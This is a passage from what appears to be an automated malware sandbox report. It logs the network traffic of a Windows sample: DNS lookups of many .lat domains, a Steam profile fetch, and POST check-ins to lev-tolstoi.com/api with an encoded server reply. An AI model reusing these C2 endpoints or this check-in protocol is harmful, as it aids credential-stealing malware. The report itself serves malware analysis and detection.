                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.166539907 CET192.168.2.51.1.1.10xaa79Standard query (0)curverpluch.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.312824965 CET192.168.2.51.1.1.10x4974Standard query (0)tentabatte.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.453182936 CET192.168.2.51.1.1.10x82f6Standard query (0)bashfulacid.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.594928026 CET192.168.2.51.1.1.10x3766Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.398699999 CET192.168.2.51.1.1.10xb884Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.350723028 CET1.1.1.1192.168.2.50x8e7eName error (3)observerfry.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.493642092 CET1.1.1.1192.168.2.50x3a65Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.731213093 CET1.1.1.1192.168.2.50x8f0fName error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:22.870779991 CET1.1.1.1192.168.2.50xafbeName error (3)manyrestro.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.013509989 CET1.1.1.1192.168.2.50x3600Name error (3)shapestickyr.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.164361000 CET1.1.1.1192.168.2.50x69eeName error (3)talkynicer.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.306277037 CET1.1.1.1192.168.2.50xaa79Name error (3)curverpluch.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.450612068 CET1.1.1.1192.168.2.50x4974Name error (3)tentabatte.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.592289925 CET1.1.1.1192.168.2.50x82f6Name error (3)bashfulacid.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:23.733939886 CET1.1.1.1192.168.2.50x3766No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.541241884 CET1.1.1.1192.168.2.50xb884No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 26, 2024 13:09:26.541241884 CET1.1.1.1192.168.2.50xb884No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                  • lev-tolstoi.com

                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  0192.168.2.549704104.102.49.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:25 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                  2024-12-26 12:09:26 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:25 GMT
                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: sessionid=993923a1e5572274823263e9; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                  2024-12-26 12:09:26 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                  2024-12-26 12:09:26 UTC16384INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                  2024-12-26 12:09:26 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                  Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                  2024-12-26 12:09:26 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
                                                                                                                                                                                                                                  Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  1192.168.2.549705172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:27 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                  2024-12-26 12:09:28 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:28 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=1o7k7uv9ptfqt0lslu4ecitln3; expires=Mon, 21 Apr 2025 05:56:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tcOlpK5JgRPh5bJsBirOACcbefqw3iZq2ZGd7GH79MsvzK11D76cN%2B9SUe9PJrmY1lMA2ZImC5AtpUAF7WqRc%2Fznx3ufktsaUDRluL98uDys1xl%2BdawlbE1vDwHi35DXRr4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f64ef99d0f6f-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1465&rtt_var=564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1914754&cwnd=209&unsent_bytes=0&cid=534b6e505c957823&ts=792&x=0"
                                                                                                                                                                                                                                  2024-12-26 12:09:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                                                                                  2024-12-26 12:09:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  2192.168.2.549706172.67.157.2544436460C:\Users\user\Desktop\YKri2nEBWE.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-26 12:09:29 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                  2024-12-26 12:09:29 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Thu, 26 Dec 2024 12:09:30 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=b03u04m5ffmgq5u922rfpd6me0; expires=Mon, 21 Apr 2025 05:56:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhgX6cuOS16OF2XIMAWnE6w83L84yIgbgdvJbezsvSXZJj2qEwMSDMkOW6PH4xQ%2FQ8LFFSlG82gjFesjFR0WX1%2BXoyWXJ5JaNo21LbSwstidlw64AP9iS6T5GfTxxwYEqBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f80f65c3fbc43a1-EWR
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1786&rtt_var=675&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1634938&cwnd=233&unsent_bytes=0&cid=0f78583ea17c74f4&ts=778&x=0"
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC248INData Raw: 34 39 31 63 0d 0a 35 6e 75 58 4d 37 66 71 59 2f 67 67 2f 73 42 54 78 5a 52 38 49 44 78 54 44 42 5a 63 32 37 72 36 69 49 73 69 6b 43 59 62 44 33 36 64 57 65 45 52 6a 64 35 50 32 6c 4f 62 34 6d 6d 78 35 67 6c 46 45 48 46 74 63 6e 37 68 33 4a 76 6b 2b 45 65 38 42 47 31 69 58 4e 77 64 39 6c 2f 45 6a 30 2f 61 52 59 62 69 61 5a 37 76 58 6b 56 53 63 54 59 30 4f 62 48 59 6d 2b 54 70 51 2f 74 4a 61 32 4d 64 6a 68 66 77 57 39 4b 4a 42 35 6c 4d 6b 36 55 32 6f 50 55 57 54 6c 55 2b 5a 48 74 2b 39 35 69 66 38 71 6b 59 73 6d 74 2b 65 78 2b 72 47 75 52 59 6c 5a 64 50 67 77 4b 62 72 6e 48 2f 74 68 31 46 58 6a 39 71 63 6a 65 7a 30 70 4c 73 36 45 62 36 56 6e 4a 70 46 6f 34 5a 38 31 72 59 67 42 4f 55 52 70 53 75 4d 4b 72 31 58 67 77 65 4e 6e 59 30 5a 76
                                                                                                                                                                                                                                  Data Ascii: 491c5nuXM7fqY/gg/sBTxZR8IDxTDBZc27r6iIsikCYbD36dWeERjd5P2lOb4mmx5glFEHFtcn7h3Jvk+Ee8BG1iXNwd9l/Ej0/aRYbiaZ7vXkVScTY0ObHYm+TpQ/tJa2MdjhfwW9KJB5lMk6U2oPUWTlU+ZHt+95if8qkYsmt+ex+rGuRYlZdPgwKbrnH/th1FXj9qcjez0pLs6Eb6VnJpFo4Z81rYgBOURpSuMKr1XgweNnY0Zv
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 6d 4c 71 75 6e 34 55 65 64 4a 61 57 74 63 6d 31 66 73 45 64 4b 45 51 63 49 43 6c 4b 34 2f 6f 76 55 52 52 56 38 78 66 48 73 2b 75 74 43 51 37 75 4e 50 2f 55 74 33 5a 78 75 4d 45 50 4a 65 30 6f 41 48 6c 55 48 63 37 48 47 67 37 6c 34 61 48 68 46 2b 64 7a 32 74 31 59 6d 71 39 67 37 72 42 48 35 68 58 4e 78 5a 38 31 2f 55 68 51 47 49 53 70 65 70 4e 4c 58 39 46 30 39 54 4d 57 4e 2b 4d 62 72 59 6e 2b 44 6a 54 2f 68 41 64 47 41 61 68 42 6d 31 48 35 57 50 47 64 6f 61 33 49 45 30 74 2f 45 53 56 42 77 4c 4c 6d 74 77 6f 4a 69 66 35 71 6b 59 73 6b 78 38 62 68 2b 50 46 76 5a 5a 33 70 6f 42 69 45 53 52 70 79 4f 68 38 78 42 49 58 53 4e 6b 65 6a 69 36 30 5a 50 6a 37 45 66 32 42 44 63 74 47 35 78 5a 72 52 48 30 68 51 71 57 53 49 75 69 63 62 69 34 42 77 4a 5a 50 53 34 73 66
                                                                                                                                                                                                                                  Data Ascii: mLqun4UedJaWtcm1fsEdKEQcIClK4/ovURRV8xfHs+utCQ7uNP/Ut3ZxuMEPJe0oAHlUHc7HGg7l4aHhF+dz2t1Ymq9g7rBH5hXNxZ81/UhQGISpepNLX9F09TMWN+MbrYn+DjT/hAdGAahBm1H5WPGdoa3IE0t/ESVBwLLmtwoJif5qkYskx8bh+PFvZZ3poBiESRpyOh8xBIXSNkeji60ZPj7Ef2BDctG5xZrRH0hQqWSIuicbi4BwJZPS4sf
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 71 70 77 44 31 58 44 6b 31 58 4b 34 61 34 56 4c 66 79 6a 53 5a 54 4a 4b 6c 4a 2b 66 70 55 46 73 65 4e 6d 49 30 5a 76 6e 56 6d 65 4c 76 55 76 31 4a 65 6d 4d 53 69 78 7a 36 57 64 57 49 44 4a 39 47 6c 36 6b 79 71 76 49 4d 53 46 34 35 61 33 55 30 73 35 6a 57 71 75 35 59 73 68 77 35 58 41 75 50 57 38 42 53 32 34 59 47 6a 41 4b 44 37 43 6a 6e 38 52 49 43 42 6e 46 6a 66 44 75 38 31 35 6e 67 35 30 58 34 53 48 46 6a 48 35 59 57 38 56 48 5a 67 41 75 58 54 4a 69 71 4f 4b 7a 39 47 45 4a 66 4f 79 34 36 66 72 37 41 32 4c 4b 70 64 50 56 49 64 47 4a 65 73 52 72 37 58 39 4b 65 51 59 55 4d 68 65 49 32 71 37 5a 47 41 6c 49 34 62 6e 38 30 76 64 69 66 35 2b 78 44 39 55 64 30 61 68 61 4b 48 76 46 64 33 49 55 48 6d 6b 57 59 70 79 4f 69 2f 78 4a 4f 48 6e 38 75 63 79 62 35 67 4e
                                                                                                                                                                                                                                  Data Ascii: qpwD1XDk1XK4a4VLfyjSZTJKlJ+fpUFseNmI0ZvnVmeLvUv1JemMSixz6WdWIDJ9Gl6kyqvIMSF45a3U0s5jWqu5Yshw5XAuPW8BS24YGjAKD7Cjn8RICBnFjfDu815ng50X4SHFjH5YW8VHZgAuXTJiqOKz9GEJfOy46fr7A2LKpdPVIdGJesRr7X9KeQYUMheI2q7ZGAlI4bn80vdif5+xD9Ud0ahaKHvFd3IUHmkWYpyOi/xJOHn8ucyb5gN
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 73 68 77 35 5a 42 57 57 46 2f 74 59 32 49 34 4a 6e 55 79 52 71 54 65 73 38 52 6c 45 55 7a 6c 6a 63 54 32 34 33 4a 4c 34 36 6b 76 34 53 58 4d 74 55 73 51 65 37 52 47 4e 79 43 61 57 61 34 79 35 49 37 47 32 41 51 78 48 63 57 6c 34 66 75 47 59 6d 2b 58 67 54 2f 70 4d 64 6d 49 59 69 68 2f 7a 58 4e 43 48 43 34 68 4b 6b 71 38 36 71 50 30 4d 51 6c 4d 31 59 6e 41 32 73 74 4c 59 70 4b 6c 48 36 67 51 68 4c 53 6d 4a 46 76 56 53 77 38 67 65 31 46 76 63 70 54 33 6e 72 6c 35 4f 55 44 46 68 65 44 4b 79 30 4a 6e 6d 35 30 66 33 54 58 46 6c 44 6f 55 64 2f 56 44 62 68 77 43 65 52 35 6d 6d 4e 71 50 77 45 51 49 51 63 57 6c 73 66 75 47 59 74 38 33 63 41 74 4e 2b 4f 58 4a 53 6e 56 6e 79 58 5a 58 51 51 5a 5a 42 6b 4b 6f 2b 6f 66 38 53 53 46 63 36 59 6e 38 36 74 64 47 64 37 4f 68
                                                                                                                                                                                                                                  Data Ascii: shw5ZBWWF/tY2I4JnUyRqTes8RlEUzljcT243JL46kv4SXMtUsQe7RGNyCaWa4y5I7G2AQxHcWl4fuGYm+XgT/pMdmIYih/zXNCHC4hKkq86qP0MQlM1YnA2stLYpKlH6gQhLSmJFvVSw8ge1FvcpT3nrl5OUDFheDKy0Jnm50f3TXFlDoUd/VDbhwCeR5mmNqPwEQIQcWlsfuGYt83cAtN+OXJSnVnyXZXQQZZBkKo+of8SSFc6Yn86tdGd7Oh
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 32 6f 56 6c 68 66 34 58 74 32 41 43 4a 74 47 6d 61 38 33 71 2f 77 66 52 56 41 2f 5a 6a 52 77 2b 64 2b 41 71 72 45 41 30 31 52 69 66 77 71 4a 4f 50 68 65 6c 5a 64 50 67 77 4b 62 72 6e 48 2f 74 68 64 51 57 6a 78 38 66 54 6d 33 31 35 76 34 36 45 33 35 56 6e 35 69 47 49 4d 56 38 31 37 54 69 51 53 51 54 70 75 6e 4f 71 6a 36 58 67 77 65 4e 6e 59 30 5a 76 6e 32 6b 2f 6e 2b 51 2f 78 50 62 33 5a 63 6d 31 66 73 45 64 4b 45 51 63 49 43 6e 36 6b 36 6f 2f 59 53 51 6c 6f 38 62 6d 59 78 76 74 2b 52 34 66 74 4b 39 55 4e 79 5a 52 65 4c 48 2b 64 64 32 35 6f 45 69 46 44 63 37 48 47 67 37 6c 34 61 48 67 64 70 5a 43 36 36 6d 71 6e 38 36 6c 62 35 53 58 55 74 41 38 6f 41 74 56 62 5a 79 46 6e 61 52 4a 4f 72 4d 71 6a 33 46 30 35 54 4e 47 64 78 50 37 2f 63 6b 75 44 70 52 76 52 46
                                                                                                                                                                                                                                  Data Ascii: 2oVlhf4Xt2ACJtGma83q/wfRVA/ZjRw+d+AqrEA01RifwqJOPhelZdPgwKbrnH/thdQWjx8fTm315v46E35Vn5iGIMV817TiQSQTpunOqj6XgweNnY0Zvn2k/n+Q/xPb3Zcm1fsEdKEQcICn6k6o/YSQlo8bmYxvt+R4ftK9UNyZReLH+dd25oEiFDc7HGg7l4aHgdpZC66mqn86lb5SXUtA8oAtVbZyFnaRJOrMqj3F05TNGdxP7/ckuDpRvRF
                                                                                                                                                                                                                                  2024-12-26 12:09:30 UTC1369INData Raw: 51 65 2b 52 47 4e 79 41 4b 64 51 5a 32 6f 4f 4b 76 35 47 55 5a 4d 4f 32 6c 6d 50 37 6a 54 6c 65 62 70 54 66 39 4f 65 47 51 52 69 42 54 79 56 74 71 4e 51 64 51 43 6d 37 70 78 2f 37 59 2f 54 31 55 39 4e 53 35 2b 70 70 61 42 71 75 35 4d 73 68 77 35 62 52 61 42 45 2f 68 53 32 6f 73 54 6d 30 53 4f 6f 6a 79 74 35 42 52 4a 57 7a 78 6a 65 54 32 2f 33 70 50 6d 2b 30 6e 79 52 33 49 74 55 73 51 65 37 52 47 4e 79 43 4b 4e 56 4a 61 6c 50 62 48 39 48 30 46 49 50 48 34 30 63 50 6e 4a 6e 2f 75 70 47 4f 52 55 62 6d 6f 44 79 67 43 31 56 74 6e 49 57 64 70 45 6c 61 51 32 6f 66 67 4d 52 31 67 2b 59 58 30 33 76 64 43 62 36 75 31 45 39 55 46 36 59 52 65 44 47 76 70 56 33 49 59 49 6c 51 4c 53 34 6a 61 2f 74 6b 59 43 66 79 70 74 65 44 50 35 78 39 62 7a 71 55 66 2b 42 43 45 74 45
                                                                                                                                                                                                                                  Data Ascii: Qe+RGNyAKdQZ2oOKv5GUZMO2lmP7jTlebpTf9OeGQRiBTyVtqNQdQCm7px/7Y/T1U9NS5+ppaBqu5Mshw5bRaBE/hS2osTm0SOojyt5BRJWzxjeT2/3pPm+0nyR3ItUsQe7RGNyCKNVJalPbH9H0FIPH40cPnJn/upGORUbmoDygC1VtnIWdpElaQ2ofgMR1g+YX03vdCb6u1E9UF6YReDGvpV3IYIlQLS4ja/tkYCfypteDP5x9bzqUf+BCEtE
